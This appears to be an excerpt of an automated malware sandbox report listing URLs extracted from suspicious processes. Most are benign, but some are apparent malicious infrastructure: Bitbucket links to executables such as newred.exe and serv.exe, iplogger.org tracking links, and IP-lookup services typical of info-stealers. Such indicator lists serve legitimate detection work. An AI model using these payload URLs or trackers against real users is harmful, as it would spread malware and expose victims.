Source: 1wOdXavtlE.exe, 00000000.00000002.348197996.0000000000E37000.00000004.00000040.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: 1wOdXavtlE.exe, 00000000.00000002.348197996.0000000000E37000.00000004.00000040.sdmp	String found in binary or memory: http://www.fontbureau.coma9
Source: 1wOdXavtlE.exe, 00000000.00000002.348197996.0000000000E37000.00000004.00000040.sdmp	String found in binary or memory: http://www.fontbureau.comicta
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/termsofservice
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: servs.exe, 00000011.00000003.438656448.00000000024A0000.00000004.00000001.sdmp, servs.tmp, servs.tmp, 00000013.00000000.443300076.0000000000401000.00000020.00020000.sdmp, pass.exe, 00000018.00000003.463502157.000000007FC40000.00000004.00000001.sdmp, pass.tmp, 0000001A.00000000.466868990.0000000000401000.00000020.00020000.sdmp	String found in binary or memory: http://www.innosetup.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: servs.exe	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: servs.exe, 00000011.00000002.542433050.0000000000401000.00000020.00020000.sdmp, pass.exe, 00000018.00000000.459756419.0000000000401000.00000020.00020000.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: servs.exe, 00000011.00000003.438656448.00000000024A0000.00000004.00000001.sdmp, servs.tmp, pass.exe, 00000018.00000003.463502157.000000007FC40000.00000004.00000001.sdmp, pass.tmp, 0000001A.00000000.466868990.0000000000401000.00000020.00020000.sdmp	String found in binary or memory: http://www.remobjects.com/ps
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 1wOdXavtlE.exe, 00000002.00000002.476078937.0000000000402000.00000040.00000001.sdmp, sssevs.exe, 00000019.00000002.498675176.0000000004529000.00000004.00000001.sdmp	String found in binary or memory: https://api.ip.sb/geoipAppData
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: https://api.ip.sb4
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.476078937.0000000000402000.00000040.00000001.sdmp, sssevs.exe, 00000019.00000002.498675176.0000000004529000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com
Source: 1wOdXavtlE.exe, 00000002.00000002.486504849.0000000002E4E000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.486504849.0000000002E4E000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/62ab596d-a885-
Source: 1wOdXavtlE.exe, 00000002.00000002.485534638.0000000002D29000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/9580842f-6891-
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.485408204.0000000002CE9000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/a1867a39-2dbe-
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org
Source: 1wOdXavtlE.exe, 00000002.00000002.485462160.0000000002CF9000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/mminminminmin05/testtest/downloads/newred.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.485462160.0000000002CF9000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/mminminminmin05/testtest/downloads/serv.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.486504849.0000000002E4E000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.485462160.0000000002CF9000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/mminminminmin05/testtest/downloads/test.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.486504849.0000000002E4E000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.orgD8
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: svchost.exe, 0000000F.00000003.448897541.00000221A3B7C000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.448884292.00000221A3B74000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 0000000F.00000003.448884292.00000221A3B74000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/parents/
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.485534638.0000000002D29000.00000004.00000001.sdmp	String found in binary or memory: https://d301sr5gafysq2.cloudfront.net;
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 0000000F.00000003.448897541.00000221A3B7C000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.448884292.00000221A3B74000.00000004.00000001.sdmp	String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: https://get.adob
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: https://helpx.ad
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: https://icanhazip.com
Source: 1wOdXavtlE.exe, 00000002.00000002.476078937.0000000000402000.00000040.00000001.sdmp, sssevs.exe, 00000019.00000002.498675176.0000000004529000.00000004.00000001.sdmp	String found in binary or memory: https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy
Source: svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: https://instagram.com/hiddencity_
Source: 1wOdXavtlE.exe, 00000002.00000002.476078937.0000000000402000.00000040.00000001.sdmp, sssevs.exe, 00000019.00000002.498675176.0000000004529000.00000004.00000001.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: 1wOdXavtlE.exe, 00000002.00000002.485462160.0000000002CF9000.00000004.00000001.sdmp	String found in binary or memory: https://iplogger.org/1tMzh7
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	String found in binary or memory: https://iplogger.org/1tncg7
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	String found in binary or memory: https://iplogger.org/1tncg72
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	String found in binary or memory: https://iplogger.org/1tncg7:
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	String found in binary or memory: https://iplogger.org/1tncg7r
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	String found in binary or memory: https://iplogger.org/1tsTg7
Source: 1wOdXavtlE.exe, 00000002.00000002.483173141.0000000001111000.00000004.00000020.sdmp	String found in binary or memory: https://iplogger.org/1tsTg78
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	String found in binary or memory: https://iplogger.org/1tsTg7Z
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 1wOdXavtlE.exe, 00000002.00000002.500485146.000000000443C000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0D
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.490169443.0000000003080000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
